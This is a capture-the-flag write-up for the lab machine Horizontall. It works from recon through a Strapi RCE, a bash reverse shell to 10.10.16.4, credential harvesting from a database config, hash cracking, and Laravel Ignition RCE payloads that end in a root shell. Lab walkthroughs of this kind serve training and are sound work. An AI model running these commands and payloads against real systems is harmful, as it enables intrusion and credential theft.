Horizontall
Personal Rating: Medium
sudo nmap -A -p- -oA nmap-horizontall 10.10.11.105
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|_http-server-header: nginx/1.14.0 (Ubuntu)
We are redirected to horizontall.htb when giving the IP

At the bottom there is a contact form:

The site does not have cookies.
https://horizontall.htb does not connect.
Checking with Burpsuite, the contact form does not send anything.
According to Wappalyzer the site uses: Ubuntu, Nginx 1.14.0, Webpack and core-js 3.13.1
Simple webdir/file scan:
feroxbuster -u http://horizontall.htb
http://horizontall.htb/js/app.c68eb462.js
VHost scan:
ffuf -u http://horizontall.htb -H 'Host: FUZZ.horizontall.htb' -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -t 64 -fs 194
api-prod
Checking some extensions, index.html works, so it's a static page as it seems.
In one of the js files “Vue.js v2.6.12” is mentioned.
For the OpenSSH version there is a username enumeration according to searchsploit, but nothing really interesting.
Adding the Domain I found with the VHost scan to my hosts file, I can access it:

feroxbuster -u
http://api-prod.horizontall.htb/
This quickly found somthing:
/admin
/admin/layout
/admin/init
/reviews
/users


So Strapi is the CMS. The site also uses styled-components 4.4.1 and React.
Searching for strapi, there is a striking vulnerability:

Strapi RCE

This seems to be the way as the exploit worked to get a valid token
authenticated JSON Web Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzA1NDA1MTc5LCJleHAiOjE3MDc5OTcxNzl9.-6PxktG8qMTglMPv2PYTPQDrzc6bb7oIG01Ml8DzC9M
I tried some commands in the exploit shell and this one worked to get a netcat shell:
bash -c 'bash -i >& /dev/tcp/10.10.16.4/4444 0>&1'

I added my public ssh key for persistence, which worked to get ssh access.
Internal Enumeration
The user is strapi and his home is /opt/strapi. sudo -l does not work and he has no special groups.
ss -tlpn reveils that port 1337 and port 3306 (mysql) are internally listening. 1337 comes from the exploit, but the database might be of interest.
In /home there is the user ‘developer’.
uname -a
: Linux horizontall 4.15.0-154-generic
I transferred linpeas.sh onto /opt/strapi/ with wget, made it executable with chmod +x and executed it
CVE-2021-4034 might work
strapi 1879 0.0 2.5 883716 51924 ? Ssl Jan15 0:12 PM2 v4.5.6: God Daemon (/opt/strapi/.pm2)
══╣ Possible private SSH keys were found!
/opt/strapi/myapi/node_modules/spdy/test/fixtures.js
/opt/strapi/myapi/node_modules/selfsigned/README.md
/opt/strapi/myapi/node_modules/nodemailer-fetch/test/fetch-test.js
/opt/strapi/myapi/node_modules/public-encrypt/test/rsa.1024.priv
/opt/strapi/myapi/node_modules/public-encrypt/test/test_key.pem
/opt/strapi/myapi/node_modules/public-encrypt/test/rsa.pass.priv
/opt/strapi/myapi/node_modules/public-encrypt/test/pass.1024.priv
/opt/strapi/myapi/node_modules/public-encrypt/test/rsa.2028.priv
/opt/strapi/myapi/node_modules/public-encrypt/test/ec.priv
/opt/strapi/myapi/node_modules/public-encrypt/test/test_rsa_privkey_encrypted.pem
/opt/strapi/myapi/node_modules/public-encrypt/test/test_rsa_privkey.pem
/opt/strapi/myapi/node_modules/public-encrypt/test/ec.pass.priv
/opt/strapi/myapi/node_modules/request/node_modules/http-signature/http_signing.md
/opt/strapi/myapi/node_modules/http-signature/http_signing.md
- /tmp/tmux-1001
- -rw-rw-r-- 1 strapi strapi 351 May 26 2021 /opt/strapi/myapi/config/environments/development/database.json
{
"defaultConnection": "default",
"connections": {
"default": {
"connector": "strapi-hook-bookshelf",
"settings": {
"client": "mysql",
"database": "strapi",
"host": "127.0.0.1",
"port": 3306,
"username": "developer",
"password": "#J!:F9Zt2u"
},
"options": {}
}
}
}
There we go, we have a password.

I could log in with mysql -u developer -p

use strapi;
show tables;
select * from strapi_administrator;

admin:$2a$10$5ifT08Gg.vNohDdl33qY..eiL77hPRKPdsaj7zFqCa8TZez6JN4s2
hashcat --help | grep -i blowfish
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
hashcat -a 0 -m 3200 '$2a$10$5ifT08Gg.vNohDdl33qY..eiL77hPRKPdsaj7zFqCa8TZez6JN4s2' /usr/share/seclists/Passwords/rockyou.txt
This would take 9h, even on my GPU.
In my ss -tlpn output I overlooked that there is port 8000 open, which is unusual. I will start an ssh dynamic port forwarding and see whats on this port. Before that I will have a look at the database again.
Internal Website Enumeration
ssh -D 9050 -i id_ed25519 root@10.10.11.105
proxychains nmap -A -p 8000 localhost
PORT STATE SERVICE VERSION
8000/tcp open http (PHP 7.4.22)
|_http-title: Laravel
| GetRequest:
| HTTP/1.0 200 OK
| Date: Wed, 17 Jan 2024 11:27:44 GMT
| Connection: close
| X-Powered-By: PHP/7.4.22
| Content-Type: text/html; charset=UTF-8
| Cache-Control: private, must-revalidate
Set-Cookie: laravel_session=eyJpdiI6IkkrMU91TVUyUW0vaTlMTFNTTURkVGc9PSIsInZhbHVlIjoiNnlFQ29CUjlMbmUvYjRZQXFDSk9rMXdNbUdTT3R4MjBLSHF6THQxK0pOTXQ2TC9BVWxkVUNhRGpRWkg3Z09VVWpHK0h4TGxvTDFyVmhwNUVKUjF0ODhhamw3TW04b1dxZzdnVW5DV1
Set-Cookie: XSRF-TOKEN=eyJpdiI6IllXTjVPMXpWaU9wRDE2ZkwrR25zOWc9PSIsInZhbHVlIjoid1pNT1JrcDdEOEluak1UYWpJdlZlaDdWNzh2Q0RrVUpOWEZBcHJvOVN4dDZySXZ4QlJVeWZuRHV6anRVck5PYkJsZTQ0WFRuNndWMkRjeFFzamlCM3cySlpSVXMvcVVjWk1UMlRrT29yRWRBeHB0ZkZ3Rld2RUNDM0dFQXMxK2MiLCJtYWMiOiJmNjMxOWE1Y2FjMTcyZjg1ZDZhN2Y0NTliMzYyNWM3ZmJjZWNiMTVkMzU1MzJkNzFmODhkOGY2YzY5ZGJmYTQ1In0%3D
I did not manage to establish a proxied connection to the server with a browser at first, but a simple proxychains curl
http://127.0.0.1:8000/
revealed this:
Laravel v8 (PHP v7.4.18)
searchsploit does not return anything for Laravel v8. A web search shows a possible RCE for some Laravel 8 versions. I will try this: https://www.exploit-db.com/exploits/49424
Laravel RCE
After downloading the necessary dependency I attempted the exploitatoin with this:
proxychains python3 exploit.py http://127.0.0.1:8000 /var/www/html/laravel/storage/logs/laravel.log 'id'
Since this did not work because of network issues, I transferred the exploit onto the host and executed it there.
This did not work either, as it seems, again because of some networking issues.
For some reason, proxychains curl
http://127.0.0.1:8000
works, but using a proxy in the browser does not.
Finally, I could make it work, there was just a misconfiguration in the browser settings.

I had to set the socks5 proxy 127.0.0.1:9050 in the browser after setting localhost proxy manipulation protection to off in about:config
feroxbuster --proxy socks5://127.0.0.1:9050 -u
http://127.0.0.1:8000/
-C 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
ls -lRha | grep -i laravel
I could now try the exploit again, but I noticed that there is no laravel log file, so It will not work anyways. I searched the entire system and there are no files with laravel in the name.
This looks promising, I might have to make the server create a log first.
According to the article, the test for vulnerability worked and the following command returned the right error:
curl -d '{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd%00"}}' -H 'Content-Type: application/json' http://127.0.0.1:8000/_ignition/execute-solution | grep failed
Then the guide suggest clearing the log file like this:
curl -H 'Content-Type: application/json' -X POST -d '{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "php://filter/read=consumed/resource=/src/storage/logs/laravel.log"}}'
http://127.0.0.1:8000/_ignition/execute-solution
This returned a ton of output and also revealed the folder /home/developer/myproject/vendor/laravel
Since I finally know the laravel folder, I might try the other exploit from exploitdb again.
I retrieved this on my host: git clone https://github.com/ambionics/phpggc.git and made a tarball of it and transferred it onto the target with a python server and wget. I then executed the python exploit again, but it did not work, so I will continue to follow the guide.
python3 exploit.py
http://127.0.0.1:8000
/home/developer/myproject/vendor/laravel/storage/logs/laravel.log ‘id’
I will poke around more to find the log location
Got it!
python3 exploit.py http://127.0.0.1:8000 /home/developer/myproject/storage/logs/laravel.log 'id'
Exploit...
uid=0(root) gid=0(root) groups=0(root)
Last updated